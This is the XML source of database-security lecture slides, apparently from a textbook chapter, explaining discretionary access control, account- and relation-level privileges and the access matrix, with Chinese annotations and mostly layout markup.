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50" r:id="rId2"/>
    <p:sldId id="309" r:id="rId3"/>
    <p:sldId id="330" r:id="rId4"/>
    <p:sldId id="384" r:id="rId5"/>
    <p:sldId id="434" r:id="rId6"/>
    <p:sldId id="433" r:id="rId7"/>
    <p:sldId id="385" r:id="rId8"/>
    <p:sldId id="437" r:id="rId9"/>
    <p:sldId id="439" r:id="rId10"/>
    <p:sldId id="518" r:id="rId11"/>
    <p:sldId id="388" r:id="rId12"/>
    <p:sldId id="441" r:id="rId13"/>
    <p:sldId id="442" r:id="rId14"/>
    <p:sldId id="443" r:id="rId15"/>
    <p:sldId id="502" r:id="rId16"/>
    <p:sldId id="444" r:id="rId17"/>
    <p:sldId id="503" r:id="rId18"/>
    <p:sldId id="448" r:id="rId19"/>
    <p:sldId id="451" r:id="rId20"/>
    <p:sldId id="504" r:id="rId21"/>
    <p:sldId id="505" r:id="rId22"/>
    <p:sldId id="458" r:id="rId23"/>
    <p:sldId id="459" r:id="rId24"/>
    <p:sldId id="460" r:id="rId25"/>
    <p:sldId id="517" r:id="rId26"/>
    <p:sldId id="461" r:id="rId27"/>
    <p:sldId id="462" r:id="rId28"/>
    <p:sldId id="465" r:id="rId29"/>
    <p:sldId id="467" r:id="rId30"/>
    <p:sldId id="507" r:id="rId31"/>
    <p:sldId id="468" r:id="rId32"/>
    <p:sldId id="469" r:id="rId33"/>
    <p:sldId id="470" r:id="rId34"/>
    <p:sldId id="473" r:id="rId35"/>
    <p:sldId id="474" r:id="rId36"/>
    <p:sldId id="476" r:id="rId37"/>
    <p:sldId id="509" r:id="rId38"/>
    <p:sldId id="508" r:id="rId39"/>
    <p:sldId id="477" r:id="rId40"/>
    <p:sldId id="510" r:id="rId41"/>
    <p:sldId id="500" r:id="rId42"/>
    <p:sldId id="501" r:id="rId43"/>
    <p:sldId id="511" r:id="rId44"/>
    <p:sldId id="520" r:id="rId45"/>
    <p:sldId id="512" r:id="rId46"/>
    <p:sldId id="513" r:id="rId47"/>
    <p:sldId id="514" r:id="rId48"/>
    <p:sldId id="515" r:id="rId49"/>
    <p:sldId id="516" r:id="rId50"/>
    <p:sldId id="519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  <p:sldId id="531" r:id="rId62"/>
    <p:sldId id="532" r:id="rId63"/>
    <p:sldId id="533" r:id="rId64"/>
    <p:sldId id="534" r:id="rId65"/>
    <p:sldId id="535" r:id="rId66"/>
    <p:sldId id="536" r:id="rId67"/>
    <p:sldId id="537" r:id="rId68"/>
    <p:sldId id="538" r:id="rId69"/>
    <p:sldId id="539" r:id="rId70"/>
    <p:sldId id="540" r:id="rId71"/>
    <p:sldId id="541" r:id="rId72"/>
    <p:sldId id="542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FF0000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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FF0000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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FF0000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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FF0000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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FF0000"/>
      </a:buClr>
      <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/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200" kern="1200" baseline="-25000">
        <a:solidFill>
          <a:schemeClr val="bg2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orient="horz" pos="4185">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3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0066"/>
    <a:srgbClr val="0028A8"/>
    <a:srgbClr val="290CD6"/>
    <a:srgbClr val="00CC00"/>
    <a:srgbClr val="99FF33"/>
    <a:srgbClr val="FF99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30" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="85" d="100"/>
          <a:sy n="85" d="100"/>
        </p:scale>
        <p:origin x="882" y="60"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1872"/>
        <p:guide orient="horz" pos="4185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30" d="100"/>
          <a:sy n="30" d="100"/>
        </p:scale>
        <p:origin x="-104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E2C576-EA54-46D6-B08A-2C3B2C0A9F86}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/5/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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FAE279-AB60-4411-A0A3-C6B0BB4B8F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1736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3D9B78-17EA-4BF1-9502-ADB69049BE4A}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/5/2019</a:t>
            </a:fld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56408D-FACC-4958-9315-023FA4C3B4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2822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3206C52-4CF9-47AE-9663-69CBEB314303}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>1/5/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/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03B2E-870E-481E-A3EF-30D33A4215DD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715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2E3CB94-69E1-4BD1-8871-04584EEC29AC}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>1/5/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/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3D73A-3CAB-4D1A-AC1A-6EFFC50E7A1B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42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B49DBE5-61BC-4070-93FD-0D661F26D1C6}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>1/5/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/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F5E77-43D3-4027-8B6E-A1DE03808E9D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203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A1D0E3B-4984-4C5A-8760-D96807CEE7E0}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>1/5/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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F832BFA-D75F-408D-A29B-1071397E580B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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4520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統計數據庫主要用於生成各種人口的統計數據。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>群體是滿足某些選擇條件的一組關係元組。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>允許用戶檢索總體的統計信息，例如平均值，總和，計數，最大值，最小值和標準偏差。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>應保護個人機密數據不被用戶訪問。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EC1B85-874B-46AA-9F75-227302B2D268}" type="datetime1">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>1/5/2019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7A1A4C-CA67-4829-9C41-C53085B9FB16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842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aseline="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aseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill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© Shamkant B. Navathe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW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942FB9-658E-431D-ADE4-4AE04A1B00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83C70B35-CFF9-4D64-B5F0-0F6D56CFCB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E47AE420-F8DE-4F94-B867-05A734103C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84288" y="609600"/>
            <a:ext cx="71739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7153275" y="6386513"/>
            <a:ext cx="1905000" cy="387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62ADB09D-30C5-4F16-82D0-34A4C1C10D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56EEE-AEFC-4B1B-8E07-1F387C93B1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6971A59E-8BCD-4E49-BC26-996C6B39A9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9A4CCD76-D282-4885-A62A-F10CC5441E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4057ABDD-DFC9-405F-B3CE-FE3F52637D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19A8EA6E-A8D7-4EE4-B9F5-957F6E016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E363043F-FA0E-4D15-8B78-723F921B0C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71F6C936-1CB2-47DC-B60F-016A2680E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Chapter 23-</a:t>
            </a:r>
            <a:fld id="{46BAB859-1F77-4F44-8A09-4401585147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122238"/>
            <a:ext cx="87741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46963" y="6386513"/>
            <a:ext cx="16113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600" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DF79C603-14F0-4945-B4F8-A8DDBBE6A3D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3" y="1158875"/>
            <a:ext cx="8774112" cy="522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95" r:id="rId1"/>
    <p:sldLayoutId id="2147484294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8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1pPr>
      <a:lvl2pPr marL="538163" indent="-274638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400">
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="720725" indent="-1825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000">
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="985838" indent="-26511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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1168400" indent="-1825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8.wmf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0388" y="411061"/>
            <a:ext cx="7772400" cy="3400425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Chapter 25</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Database Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Part 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4000" b="1" dirty="0"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7" y="3811486"/>
            <a:ext cx="7634385" cy="2278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5F112F-C118-4935-9470-F76935B33BF1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charset="-120"/>
              </a:rPr>
              <a:t>Chapter Outline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303338"/>
            <a:ext cx="8048625" cy="49974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Introduction to Database Security Issues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Discretionary Access Control Based on Granting Revoking Privileges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Mandatory Access Control and Role-Based Access Control for Multilevel Security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SQL Injection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Introduction to Statistical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Introduction to Flow Control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Encryption and Public Key Infrastructures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Privacy Issues and Preservation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Challenges of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Oracle Label-Based Security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2B51F7-C739-4723-A7AC-11711CC15BD7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47625"/>
            <a:ext cx="8774112" cy="110172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Discretionary Access Control Based on Granting and Revoking Privileges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257300"/>
            <a:ext cx="8174037" cy="368617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Enforcing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discretionary access control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is based on the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granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> and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revoking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體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privileges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Types of Discretionary Privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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b="1" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>account level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>specifies the particular privileges that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each account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>holds independently of the relations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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b="1" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>relation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>or table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>control the privilege to access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each individual relation or view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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24581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047" y="4669161"/>
            <a:ext cx="1263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2722" y="4612011"/>
            <a:ext cx="49117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-右雙向箭號 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2623722" y="5277173"/>
            <a:ext cx="733425" cy="25717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indent="-609600"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24584" name="矩形 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1131472" y="5826448"/>
            <a:ext cx="1600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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>account level</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="矩形 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3512722" y="5789936"/>
            <a:ext cx="17319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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>relation level</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1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56" y="6180078"/>
            <a:ext cx="238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aseline="0" dirty="0"/>
              <a:t>(select? update? …) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="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79560" y="6132423"/>
            <a:ext cx="238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aseline="0" dirty="0"/>
              <a:t>(select? update? …) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline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79447BE-B1FF-406A-A266-B9F5C21016E5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122238"/>
            <a:ext cx="7989887" cy="884237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Privileges at Account Level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006475"/>
            <a:ext cx="8774112" cy="45466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The privileges at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>account level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> can include 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CREATE SCHEMA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>or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CREATE TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>privilege, to create a schema or base relation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="263525" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>屬於架構</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>,database(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Ex,company</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>屬於表單</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean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CREATE VIEW </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>privilege; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="720725" lvl="3" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>	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ALTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privilege, to apply schema changes such adding or removing attributes from relations; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>的權利</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRP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DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privilege, to delete relations or views; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>刪除資料表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRP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MODIFY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privilege, to insert, delete, or update tuples; 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sz="1800" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privilege, to retrieve information from the database by using a SELECT query.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800" dirty="0">
              <a:ea typeface="新細明體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851978" y="5327650"/>
            <a:ext cx="3822377" cy="1252538"/>
            <a:chOff x="2851978" y="5327650"/>
            <a:chExt cx="3822377" cy="1252538"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25606" name="群組 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2851978" y="5327650"/>
              <a:ext cx="1239838" cy="1252538"/>
              <a:chOff x="1574800" y="5416550"/>
              <a:chExt cx="1239838" cy="1252340"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25608" name="Picture 5" descr="C:\Program Files (x86)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74800" y="5416550"/>
                <a:ext cx="1074738" cy="1020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09" name="矩形 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1574800" y="6361113"/>
                <a:ext cx="123983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TW" sz="1400" b="1" baseline="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>account level</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1400" baseline="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="向右箭號 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4091816" y="6021796"/>
              <a:ext cx="1224000" cy="180000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" name="流程圖: 磁碟 1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5471720" y="5606222"/>
              <a:ext cx="1202635" cy="820053"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk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marR="0" indent="-6096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r>
                <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0"/>
                <a:t>DB</a:t>
              </a:r>
              <a:endPara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4007377" y="5512150"/>
              <a:ext cx="1392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aseline="0" dirty="0"/>
                <a:t>Create? Select? Update? …</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" baseline="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04E87A-6801-4405-9484-B3C0BBA35724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Discretionary Privileges at Relation Level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08064"/>
            <a:ext cx="8774113" cy="26332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The second level of privileges applies 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relation level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>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whether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they are base relations or virtual (view) relations.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Access matrix model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, where the rows of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>matrix M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> represents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subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> (users, accounts, programs) and the columns represent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objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> (relations, records, columns, views, operations).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1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Each position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i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/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in the matrix represents the types of privileges (read, write, update) that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subject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" i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holds on object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 j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>.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48343"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2518465" y="3848126"/>
          <a:ext cx="5091747" cy="186055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Employee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Project.PName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User1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read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update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User2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read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update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Program1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update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write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667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177" y="4116414"/>
            <a:ext cx="1263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4286774" y="5847539"/>
            <a:ext cx="1895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Matrix</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline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668CBC-67D6-48F7-88F2-CC827CCB88DE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1222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Discretionary Privileges: Grant and Revoke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68375"/>
            <a:ext cx="8774112" cy="33369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Each relation R is assigned an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owner account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
